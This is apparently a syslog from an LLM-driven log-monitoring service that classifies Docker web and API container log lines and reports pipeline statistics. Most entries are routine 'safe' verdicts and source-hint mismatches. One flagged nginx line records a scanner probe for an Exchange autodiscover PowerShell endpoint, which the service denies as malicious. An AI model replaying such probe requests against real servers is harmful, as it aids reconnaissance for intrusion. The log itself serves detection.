action=allow pattern_type=prefix Mar 19 22:31:46 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:46.323407 [analyzer] Source hint mismatch: LLM says "docker container reverse-proxy / app web server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:48.701836 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=contains Mar 19 22:31:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:48.701874 [analyzer] Source hint mismatch: LLM says "docker/captain container access log (app HTTP)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:51.855685 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow 
pattern_type=prefix Mar 19 22:31:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:51.855725 [analyzer] Source hint mismatch: LLM says "docker (container access log for app web/API requests)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:54.933254 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix Mar 19 22:31:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:54.933291 [analyzer] Source hint mismatch: LLM says "docker container reverse proxy/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:57.593774 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:31:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:57.593810 [analyzer] Source hint mismatch: LLM says "docker:captain-captain (web/API container access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:32:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:00.719682 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:32:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:00.719717 [analyzer] Source hint mismatch: LLM says "docker container web/api access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:32:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:03.991452 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 19 22:32:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:03.991513 
[SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request targets an internal-looking logs endpoint with hex encoding; could be normal but is often used for log retrieval/data exposure. Line=2026-03-19T22:32:02.624097592Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 50.835 ms - - Mar 19 22:32:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:06.161458 [observer] Pipeline: processed=376 pattern_hits=200 llm_calls=175 llm_errors=3 learned=1 Mar 19 22:32:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:06.161481 [observer] Patterns: hash=200 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=176 Mar 19 22:32:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:06.702817 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.84 action=allow pattern_type=prefix Mar 19 22:32:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:06.702854 [analyzer] Source hint mismatch: LLM says "docker container access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:32:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:09.694981 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:32:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:09.695020 [analyzer] Source hint mismatch: LLM says "docker container web/app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:32:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:12.900304 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:32:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:12.900340 [analyzer] Source hint mismatch: LLM says "docker container web/api (captain-captain)", actual 
is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:32:16 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:16.027609 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:32:16 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:16.027651 [analyzer] Source hint mismatch: LLM says "docker container access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:32:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:18.950115 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:32:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:18.950153 [analyzer] Source hint mismatch: LLM says "docker container HTTP access log (app/API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:32:22 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:22.037560 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:32:22 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:22.037593 [analyzer] Source hint mismatch: LLM says "docker/captain container web access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:32:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:24.824565 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix Mar 19 22:32:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:24.824600 [analyzer] Source hint mismatch: LLM says "docker container access log (application/http)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:32:26 ip-172-26-12-110 observer[1561913]: 
2026/03/19 22:32:26.362934 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:32:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:26.362969 [analyzer] Source hint mismatch: LLM says "docker container web/app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:32:28 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:28.095202 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 19 22:32:28 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:28.095239 [analyzer] Source hint mismatch: LLM says "docker container (captain-captain) serving an API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:32:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:30.792653 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:32:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:30.792857 [analyzer] Source hint mismatch: LLM says "docker container web/API (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:32:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:33.865344 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix Mar 19 22:32:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:33.865381 [analyzer] Source hint mismatch: LLM says "docker container web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:32:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:36.161497 [observer] Pipeline: processed=400 pattern_hits=213 llm_calls=186 llm_errors=3 learned=1 Mar 19 
22:32:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:36.161517 [observer] Patterns: hash=213 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=187 Mar 19 22:32:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:36.821660 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:32:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:36.821692 [analyzer] Source hint mismatch: LLM says "docker container web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:32:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:39.589239 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=contains Mar 19 22:32:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:39.589277 [analyzer] Source hint mismatch: LLM says "docker/captain (containerized web/API access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:32:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:42.901863 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:32:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:42.901900 [analyzer] Source hint mismatch: LLM says "docker container access logger / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:32:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:45.599699 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:32:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:45.599736 [analyzer] Source hint mismatch: LLM says "docker container access log (web service)", actual is 
"captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:32:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:48.743135 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:32:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:48.743191 [analyzer] Source hint mismatch: LLM says "docker web/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:32:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:51.616066 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.76 action=allow pattern_type=prefix Mar 19 22:32:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:51.616100 [analyzer] Source hint mismatch: LLM says "docker container access/logs (app or reverse proxy)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:32:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:54.858818 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:32:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:54.858855 [analyzer] Source hint mismatch: LLM says "application/http via docker container (captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:32:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:57.711801 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:32:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:57.711835 [analyzer] Source hint mismatch: LLM says "docker/captain-captain container HTTP access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:00 ip-172-26-12-110 observer[1561913]: 
2026/03/19 22:33:00.875228 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:33:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:00.875263 [analyzer] Source hint mismatch: LLM says "docker/captain reverse proxy or app HTTP access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:03.772589 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:33:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:03.772630 [analyzer] Source hint mismatch: LLM says "docker container reverse proxy / API gateway (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:06.161867 [observer] Pipeline: processed=424 pattern_hits=227 llm_calls=196 llm_errors=3 learned=1 Mar 19 22:33:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:06.161890 [observer] Patterns: hash=227 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=197 Mar 19 22:33:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:06.751683 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix Mar 19 22:33:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:06.751717 [analyzer] Source hint mismatch: LLM says "docker container web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:09.815600 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:33:09 ip-172-26-12-110 
observer[1561913]: 2026/03/19 22:33:09.815636 [analyzer] Source hint mismatch: LLM says "docker container web API (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:12.905542 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.66 action=suppress pattern_type=prefix Mar 19 22:33:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:12.905583 [analyzer] Source hint mismatch: LLM says "docker container access logs (HTTP API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:15.864475 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:33:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:15.864511 [analyzer] Source hint mismatch: LLM says "docker container reverse proxy / app access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:18.723044 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix Mar 19 22:33:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:18.723090 [analyzer] Source hint mismatch: LLM says "dockerized web API (access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:20 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:20.471664 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.78 action=alert pattern_type= Mar 19 22:33:20 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:20.471697 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo 
Reason=Nginx error log shows an attempted fetch of /autodiscover/autodiscover.json with a PowerShell-encoded query string, triggering file open failures (possible probing for vulnerable autodiscover endpoints). Line=2026-03-19T22:33:18.775286594Z 2026/03/19 22:33:18 [error] 415#415: *741492 open() "/usr/share/nginx/default/autodiscover/autodiscover.json" failed (2: No such file or directory), client: 135.119.97.3... Mar 19 22:33:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:21.872505 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:33:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:21.872542 [analyzer] Source hint mismatch: LLM says "docker container access log / app HTTP handler", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:22 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:22.361657 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.78 action=deny pattern_type= Mar 19 22:33:22 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:22.361696 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-19T22:33:18.775380512Z 135.119.97.34 - - [19/Mar/2026:22:33:18 +0000] "54.200.221.0" "GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 2401 "-" "Mozilla/5.0 zgrab/0.x" "-" Mar 19 22:33:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:24.764632 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix Mar 19 22:33:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:24.764668 [analyzer] Source hint mismatch: LLM says "docker container HTTP access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:25.984003 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix Mar 19 22:33:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:25.984046 [analyzer] Source hint mismatch: LLM says "docker container access log / application HTTP logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:27.886146 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:33:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:27.886203 [analyzer] Source hint mismatch: LLM says "docker container web/app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:30.783399 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:33:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:30.783436 [analyzer] Source hint mismatch: LLM says "docker/captain-captain 
(web/API access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:33.829534 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:33:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:33.829570 [analyzer] Source hint mismatch: LLM says "docker/captain web app (HTTP access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:36.160914 [observer] Pipeline: processed=450 pattern_hits=240 llm_calls=209 llm_errors=3 learned=1 Mar 19 22:33:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:36.160941 [observer] Patterns: hash=240 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=210 Mar 19 22:33:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:36.577689 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:33:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:36.577723 [analyzer] Source hint mismatch: LLM says "docker (container access log / reverse proxy)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:39.746568 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix Mar 19 22:33:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:39.746607 [analyzer] Source hint mismatch: LLM says "docker container access log (app web server)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:42.690978 [analyzer] LLM verdict for 
docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:33:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:42.691013 [analyzer] Source hint mismatch: LLM says "docker container access log (web API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:45.843781 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:33:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:45.843816 [analyzer] Source hint mismatch: LLM says "docker container access log / app HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:48.867596 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:33:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:48.867631 [analyzer] Source hint mismatch: LLM says "docker container web/app access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:51.648077 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:33:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:51.648115 [analyzer] Source hint mismatch: LLM says "docker container web/app HTTP access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:54.802334 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow 
pattern_type=prefix Mar 19 22:33:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:54.802371 [analyzer] Source hint mismatch: LLM says "docker container web/API (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:33:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:57.704392 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:33:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:57.704427 [analyzer] Source hint mismatch: LLM says "docker container web/app (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:34:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:00.633599 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 19 22:34:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:00.633641 [analyzer] Source hint mismatch: LLM says "docker container access log / app HTTP service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:34:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:03.744129 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix Mar 19 22:34:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:03.744190 [analyzer] Source hint mismatch: LLM says "docker container web server (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:34:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:06.161673 [observer] Pipeline: processed=473 pattern_hits=253 llm_calls=219 llm_errors=3 learned=1 Mar 19 22:34:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:06.161695 [observer] Patterns: hash=253 prefix=0 regex=0 contains=0 deny=0 alert=0 
suppress=0 misses=220 Mar 19 22:34:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:06.670455 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:34:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:06.670489 [analyzer] Source hint mismatch: LLM says "docker container access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:34:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:09.776567 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:34:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:09.776601 [analyzer] Source hint mismatch: LLM says "docker container access logs / reverse proxy", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:34:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:12.747815 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:34:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:12.747857 [analyzer] Source hint mismatch: LLM says "docker/captain container access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:34:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:15.800899 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix Mar 19 22:34:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:15.800943 [analyzer] Source hint mismatch: LLM says "docker containerized web/app reverse proxy logging", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:34:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:18.959616 [analyzer] LLM 
verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=contains
Mar 19 22:34:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:18.959655 [analyzer] Source hint mismatch: LLM says "docker (application reverse proxy / API service access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:21.813334 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:34:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:21.813377 [analyzer] Source hint mismatch: LLM says "docker container web service (captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
